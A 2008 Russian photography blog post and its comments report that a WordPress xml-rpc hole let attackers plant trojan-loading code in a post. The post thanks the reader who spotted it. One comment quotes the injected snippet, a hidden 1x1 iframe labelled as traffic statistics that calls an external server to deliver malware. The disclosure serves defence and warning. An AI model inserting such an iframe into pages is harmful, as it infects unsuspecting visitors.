Простые фокусы
  • 🏠 Главная
  • 📰 Статьи по фотографии
    • ☢ Тестодром
    • ✂️ Краткие ответы
  • 🎥 Видео
  • 🎙 Подкаст
  • 🎒 Фотошкола
  • 📣 Контакты
  • 📟 Подписка
  • Home
  • cpcat – пользователь месяца!

cpcat – пользователь месяца!

- Без рубрики
15.04.200815.04.2008 10 комментариев

Уважаемые коллеги, хотим довести до вашего внимания не очень приятную активность хакеров, которые зачем-то пробрались в одну из дыр WordPress, установленного на нашем сайте, и воткнули в последнюю новость нехороший код, который грузит вирус-троян на компьютер пользователя. Насколько я понял, грузил вирус он именно при прочтении поста прямо на сайте, по поводу RSS сказать что-то трудно.

Узнали мы это только благодаря крайней осмотрительности и бдительности наших пользователей, причем первым стал cpcat (огромное спасибо также Маркетологу с сайта Идеи для бизнеса), которого мы за это признаем нашим читателем (и пользователем) месяца и всячески выражаем благодарность за внимательное отношение к интернет-контенту. Собственно, силами таких людей и можно удержать интернет от вредного влияния не очень довольных жизнью людей.

Немного о вирусе: обычный троян, ссылка на который была установлена через xml-rpc (дыра, которая до сих не закрыта сообществом WP, отчего просто удалена одна функция на нашем сайте), чистится большинством антивирусных программ, ввиду чего рекомендуем всем читавшим наш сайт сегодня с утра просканировать жесткие диски, причем, вне зависимости от того, обнаруживала или нет ваша программа вирусы на сайте. Я, на всякий случай, сменил все пароли.

От лица всего коллектива сайта хочу извиниться перед нашими читателями за данную неприятность: мы никогда не хотели причинить вред вашим компьютерам и вам лично, т.к. интересуемся совершенно иными вещами. Искренне надеемся, что в будущем это не повторится. В настоящий момент, проблема локализована, дыра забита гвоздями просто через удаление возможности использования xml-rpc. По всей видимости, это пока единственный способ решения проблемы для блоггеров, использующих платформу WP.

📣 Читай то же самое в 🎙Дзене и 📲Телеграм

Навигация по записям

Завершился Фотофорум
Побывайте во рту

Еще по теме

10 комментов к “cpcat – пользователь месяца!”

  1. UncleSam:
    28.04.2008 в 14:29

    Теоретически, да. Хотя лучше все же знать уязвимости, а на форуме Вордпресса давно пишут, что “проблема решена”, и этим заниматься не собираются.

    Ответить
  2. бизнесмен:
    21.04.2008 в 20:59

    Спасибо за информацию! Пошел смотреть, что там на моих блогах творится.

    А вообще если регистрация отключена, то все нормально чтоли будет?

    Ответить
  3. UncleSam:
    17.04.2008 в 20:53

    cpcat, не соглашусь с тобой – всегда лучше если не предупредить, то хотя бы вовремя поймать. Я потом форум начитался, там пишут, что в результате заражения код внедряется даже в саму тему, после чего его надо искать уже вручную, и понятно, что кочевать по сайту он будет очень долго. Ты вовремя среагировал, чем и нам репутацию спас (а также кучу времени сэкономил), и кусочек интернета помог быстро от вируса очистить. Спасибо огромное тебе, так держать!

    Ответить
  4. cpcat:
    17.04.2008 в 20:45

    Ух.. Наверное, один сердитый коммент всё же не тянет на поступок месяца, но всё равно приятно:)

    P.S. У меня Opera+NOD32.

    Ответить
  5. pro100photo:
    16.04.2008 в 14:27

    Спасибо за инфу!

    Ответить
  6. Gromitch:
    16.04.2008 в 13:48

    О как! Спасибо за предупреждение!

    Ответить
  7. UncleSam:
    15.04.2008 в 16:40

    За ненадобностью, я его пока удалил – всегда из стандартной инсталляции вернуть можно. Пусть решают, я, как незаинтересованный, подожду.

    Ответить
  8. Alick:
    15.04.2008 в 16:34

    Его еще можно переименовать.

    Ответить
  9. UncleSam:
    15.04.2008 в 16:29

    Кстати, простите, коллеги блоггеры, сообщаю подробности:

    Подробнее о дырке можно почитать на форуме WP. Она существует с полгода уже, но если долистать до последней страницы (на данный момент, их три), можно увидеть, что дыра не закрыта до сих пор даже в версии 2.5 и хакеры ей стандартно пользуются.

    Выглядит мой случай вставки вируса следующим образом: прямо в тело записи был вставлен код

    <!– Traffic Statistics –> <iframe src=http://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

    – он вызывал скрипт на другой стороне (китайский сервер, но к национализму это никак не относится), который загружал пользователю трояна. У меня не сработало, видимо, Firefox отсек, у cpcat вызвало предупреждение.

    Внедряется код зарегистрированным пользователем через xml-rpc (файл xml-rpc.php), причем вне зависимости от того, есть права на написание или нет. Я вот думаю, не удалить ли десяток последних аккаунтов, чтобы паранойю поддержать.

    Решение было простым (правда, временным) – вырезать код из тела записи и удалить файл с дыркой. Вроде бы помогло.

    Ответить
  10. Alick:
    15.04.2008 в 16:03

    А подробнее можно? Что за дырка конкретно?

    Ответить

Добавить комментарий Отменить ответ

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Подпишись:

Все фото.видео.новости в Яндекс.Дзен Все фото.видео.новости в Telegram фото.видео.новости в Twitter Сергей Самсонов в YouTube Сергей Самсонов в Instagram
Фотосекта. Твоя фотошкола

Теги

обзор led телефон подкаст lut съемка тест объектив бизнес canon россия leica фотоаппарат android фотограф качество вспышка анонс видеосендер adobe выставка Sony смартфон nikon Fujifilm hollyland фотокамера photoshop Вчерашнее фото камера Sigma новости YouTube колдуновы Panasonic diy свет instagram фотография конкурс фото video кризис 2018 lightroom

Из последнего

  • Чем грозит потеря гарантии Nikon
  • Список объективов Sony E (FE)
  • Вовнушки (Ингушетия)
  • Тест Nikon Z5
  • Кондуки (Тульская область)

Темы

Ок, Google

Из старого

Copyright 2006-2020 Сергей Самсонов | Дизайн: LilyTurf